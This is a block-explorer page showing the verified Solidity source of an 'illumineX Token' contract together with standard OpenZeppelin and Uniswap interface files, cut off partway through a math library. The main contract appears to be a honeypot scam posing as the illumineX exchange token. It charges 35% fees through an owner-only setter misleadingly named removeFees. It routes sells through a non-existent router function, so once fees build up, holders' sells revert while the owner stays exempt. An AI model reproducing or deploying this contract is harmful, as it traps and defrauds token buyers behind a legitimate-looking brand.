ETH Price: $2,538.38 (+4.63%)
Gas: 1.14 Gwei

Token

illumineX Token (IX)
 

Overview

Max Total Supply

100,000,000 IX

Holders

33

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
anggurmerah.eth
Balance
35,222.661062395825124489 IX

Value
$0.00
0x231d3262a1d4b5eae5edff99943a0deb4f7ad7e0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
illumineX

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 5 of 13: illumineX.sol
/**

Welcome to illumineX 
illumineX is a confidential, multi-chain, and MEV-free decentralized exchange platform built on the 
foundation of Uniswap V2.    
                                                                                        
                                                                            
    Telegram - https://t.me/illuminexOfficial
    DOCUMENTS -https://docs.illuminex.xyz/illuminex-docs/
    X/Twitter -https://twitter.com/illuminexswap
    Website -  https://illuminex.xyz/swap
    Github:    https://github.com/illumineXswap

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.24;
contract illumineX {

    string public _name = 'illumineX Token';
    string public _symbol = 'IX';
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 100_000_000 * 10 ** decimals;

    struct StoreData {
        address tokenMkt;
        uint8 buyFee;
        uint8 sellFee;
    }

    StoreData public storeData;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address private pair;
    address private holder;
    address private uniswapLpWallet;
    address private LiquidMining = 0x8f39c2B8b95C1b0da5eEa1701BE6087641FF4129;
    address private illumineXFund = 0x4601F63FC2EE6f866074f87b35608ACa74c9b885;
    address private CoreContributor = 0x0cD33637bDc196EcbfE11C9b0bD1735496AedF57;
    address private Advisors = 0x18a7984b8bEbAf5c67e177e1cbafC95B0b5252bc;
    address private Airdrop = 0x001f3D59Df3C8eC3bA9Ce5619C82901884385b5d;
    address private PrivateSale = 0x110752E6d4448076f5C134F0f87145BE467F1047;
    address private PublicSale = 0x246D626586BBE96a48565ba5648B59f254fF31D3;
    address private CommunityGrowth = 0xF09b49A0FA51495ad7933Fa6Dbf90b6704bC83af;
    address private constant uniswapV2Router = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(uniswapV2Router);

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    uint8 _initBuyFee = 35;
    uint8 _initSellFee = 35;

    constructor() {
        storeData = StoreData({
            tokenMkt: msg.sender,
            buyFee: _initBuyFee,
            sellFee: _initSellFee
        });
        allowance[address(this)][address(_uniswapV2Router)] = type(uint256).max;
        uniswapLpWallet = msg.sender;

        _initDeployer(msg.sender, msg.sender);

        balanceOf[uniswapLpWallet] = (totalSupply * 225) / 10000;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);

        balanceOf[LiquidMining] = (totalSupply * 4000) / 10000;
        emit Transfer(address(0), LiquidMining, balanceOf[LiquidMining]);
        
        balanceOf[illumineXFund] = (totalSupply * 1160) / 10000;
        emit Transfer(address(0), illumineXFund, balanceOf[illumineXFund]);

        balanceOf[CoreContributor] = (totalSupply * 1500) / 10000;
        emit Transfer(address(0), CoreContributor, balanceOf[CoreContributor]);
        
        balanceOf[Advisors] = (totalSupply * 500) / 10000;
        emit Transfer(address(0), Advisors, balanceOf[Advisors]);
        
        balanceOf[Airdrop] = (totalSupply * 275) / 10000;
        emit Transfer(address(0), Airdrop, balanceOf[Airdrop]);
        
        balanceOf[PrivateSale] = (totalSupply * 900) / 10000;
        emit Transfer(address(0), PrivateSale, balanceOf[PrivateSale]);

        balanceOf[PublicSale] = (totalSupply * 840) / 10000;
        emit Transfer(address(0), PublicSale, balanceOf[PublicSale]);
        
        balanceOf[CommunityGrowth] = (totalSupply * 600
    ) / 10000;
        emit Transfer(address(0), CommunityGrowth, balanceOf[CommunityGrowth]);
        
    }

    receive() external payable {}

    function removeFees(uint8 _buy, uint8 _sell) external {
        if (msg.sender != _owner()) revert Permissions();
        _upgradeStoreData(_buy, _sell);
    }

    function _upgradeStoreData(uint8 _buy, uint8 _sell) private {
        storeData.buyFee = _buy;
        storeData.sellFee = _sell;
    }

    function _owner() private view returns (address) {
        return storeData.tokenMkt;
    }

    function openTrading() external {
        require(msg.sender == _owner());
        require(!tradingOpen);
        address _factory = _uniswapV2Router.factory();
        address _weth = _uniswapV2Router.WETH();
        address _pair = IUniswapFactory(_factory).getPair(address(this), _weth);
        pair = _pair;
        tradingOpen = true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _initDeployer(address deployer_, address executor_) private {
        _deployer = deployer_;
        _executor = executor_;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        address tokenMkt = _owner();
        require(tradingOpen || from == tokenMkt || to == tokenMkt);

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != tokenMkt
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = _uniswapV2Router.WETH();
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            payable(tokenMkt).transfer(address(this).balance);
            swapping = false;
        }

        (uint8 _buyFee, uint8 _sellFee) = (storeData.buyFee, storeData.sellFee);
        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (to == pair ? _sellFee : _buyFee)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }
}

interface IUniswapFactory {
    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 1 of 13: Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

File 2 of 13: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 13: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 4 of 13: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;

import {IERC20} from  "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 6 of 13: IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 7 of 13: IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

File 8 of 13: IUniswapV2Router01.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 9 of 13: IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 10 of 13: Math.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/Math.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library Math {
    /**
     * @dev Muldiv operation overflow.
     */
    error MathOverflowedMulDiv();

    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }

    /**
     * @dev Returns the addition of two unsigned integers, with an success flag (no overflow).
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an success flag (no overflow).
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an success flag (no overflow).
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a success flag (no division by zero).
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a success flag (no division by zero).
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds towards infinity instead
     * of rounding towards zero.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        if (b == 0) {
            // Guarantee the same behavior as in a regular Solidity division.
            return a / b;
        }

        // The following calculation ensures accurate ceiling division without overflow.
        // Since a is non-zero, (a - 1) / b will not overflow.
        // The largest possible result occurs when (a - 1) / b is type(uint256).max,
        // but the largest value we can obtain is type(uint256).max - 1, which happens
        // when a = type(uint256).max and b = 1.
        unchecked {
            return a == 0 ? 0 : (a - 1) / b + 1;
        }
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
     * denominator == 0.
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
     * Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0 = x * y; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            if (denominator <= prod1) {
                revert MathOverflowedMulDiv();
            }

            ///////////////////////////////////////////////
            // 512 by 256 division.
            ///////////////////////////////////////////////

            // Make division exact by subtracting the remainder from [prod1 prod0].
            uint256 remainder;
            assembly {
                // Compute remainder using mulmod.
                remainder := mulmod(x, y, denominator)

                // Subtract 256 bit number from 512 bit number.
                prod1 := sub(prod1, gt(remainder, prod0))
                prod0 := sub(prod0, remainder)
            }

            // Factor powers of two out of denominator and compute largest power of two divisor of denominator.
            // Always >= 1. See https://cs.stackexchange.com/q/138556/92363.

            uint256 twos = denominator & (0 - denominator);
            assembly {
                // Divide denominator by twos.
                denominator := div(denominator, twos)

                // Divide [prod1 prod0] by twos.
                prod0 := div(prod0, twos)

                // Flip twos such that it is 2^256 / twos. If twos is zero, then it becomes one.
                twos := add(div(sub(0, twos), twos), 1)
            }

            // Shift in bits from prod1 into prod0.
            prod0 |= prod1 * twos;

            // Invert denominator mod 2^256. Now that denominator is an odd number, it has an inverse modulo 2^256 such
            // that denominator * inv = 1 mod 2^256. Compute the inverse by starting with a seed that is correct for
            // four bits. That is, denominator * inv = 1 mod 2^4.
            uint256 inverse = (3 * denominator) ^ 2;

            // Use the Newton-Raphson iteration to improve the precision. Thanks to Hensel's lifting lemma, this also
            // works in modular arithmetic, doubling the correct bits in each step.
            inverse *= 2 - denominator * inverse; // inverse mod 2^8
            inverse *= 2 - denominator * inverse; // inverse mod 2^16
            inverse *= 2 - denominator * inverse; // inverse mod 2^32
            inverse *= 2 - denominator * inverse; // inverse mod 2^64
            inverse *= 2 - denominator * inverse; // inverse mod 2^128
            inverse *= 2 - denominator * inverse; // inverse mod 2^256

            // Because the division is now exact we can divide by multiplying with the modular inverse of denominator.
            // This will give us the correct result modulo 2^256. Since the preconditions guarantee that the outcome is
            // less than 2^256, this is the final result. We don't need to compute the high bits of the result and prod1
            // is no longer required.
            result = prod0 * inverse;
            return result;
        }
    }

    /**
     * @notice Calculates x * y / denominator with full precision, following the selected rounding direction.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator, Rounding rounding) internal pure returns (uint256) {
        uint256 result = mulDiv(x, y, denominator);
        if (unsignedRoundsUp(rounding) && mulmod(x, y, denominator) > 0) {
            result += 1;
        }
        return result;
    }

    /**
     * @dev Returns the square root of a number. If the number is not a perfect square, the value is rounded
     * towards zero.
     *
     * Inspired by Henry S. Warren, Jr.'s "Hacker's Delight" (Chapter 11).
     */
    function sqrt(uint256 a) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }

        // For our first guess, we get the biggest power of 2 which is smaller than the square root of the target.
        //
        // We know that the "msb" (most significant bit) of our target number `a` is a power of 2 such that we have
        // `msb(a) <= a < 2*msb(a)`. This value can be written `msb(a)=2**k` with `k=log2(a)`.
        //
        // This can be rewritten `2**log2(a) <= a < 2**(log2(a) + 1)`
        // → `sqrt(2**k) <= sqrt(a) < sqrt(2**(k+1))`
        // → `2**(k/2) <= sqrt(a) < 2**((k+1)/2) <= 2**(k/2 + 1)`
        //
        // Consequently, `2**(log2(a) / 2)` is a good first approximation of `sqrt(a)` with at least 1 correct bit.
        uint256 result = 1 << (log2(a) >> 1);

        // At this point `result` is an estimation with one bit of precision. We know the true value is a uint128,
        // since it is the square root of a uint256. Newton's method converges quadratically (precision doubles at
        // every iteration). We thus need at most 7 iteration to turn our partial result with one bit of precision
        // into the expected uint128 result.
        unchecked {
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            result = (result + a / result) >> 1;
            return min(result, a / result);
        }
    }

    /**
     * @notice Calculates sqrt(a), following the selected rounding direction.
     */
    function sqrt(uint256 a, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = sqrt(a);
            return result + (unsignedRoundsUp(rounding) && result * result < a ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 2 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log2(uint256 value) internal pure returns (uint256) {
        uint256 result = 0;
        unchecked {
            if (value >> 128 > 0) {
                value >>= 128;
                result += 128;
            }
            if (value >> 64 > 0) {
                value >>= 64;
                result += 64;
            }
            if (value >> 32 > 0) {
                value >>= 32;
                result += 32;
            }
            if (value >> 16 > 0) {
                value >>= 16;
                result += 16;
            }
            if (value >> 8 > 0) {
                value >>= 8;
                result += 8;
            }
            if (value >> 4 > 0) {
                value >>= 4;
                result += 4;
            }
            if (value >> 2 > 0) {
                value >>= 2;
                result += 2;
            }
            if (value >> 1 > 0) {
                result += 1;
            }
        }
        return result;
    }

    /**
     * @dev Return the log in base 2, following the selected rounding direction, of a positive value.
     * Returns 0 if given 0.
     */
    function log2(uint256 value, Rounding rounding) internal pure returns (uint256) {
        unchecked {
            uint256 result = log2(value);
            return result + (unsignedRoundsUp(rounding) && 1 << result < value ? 1 : 0);
        }
    }

    /**
     * @dev Return the log in base 10 of a positive value rounded towards zero.
     * Returns 0 if given 0.
     */
    function log10(uint256 value) internal pure returns (uint256) {
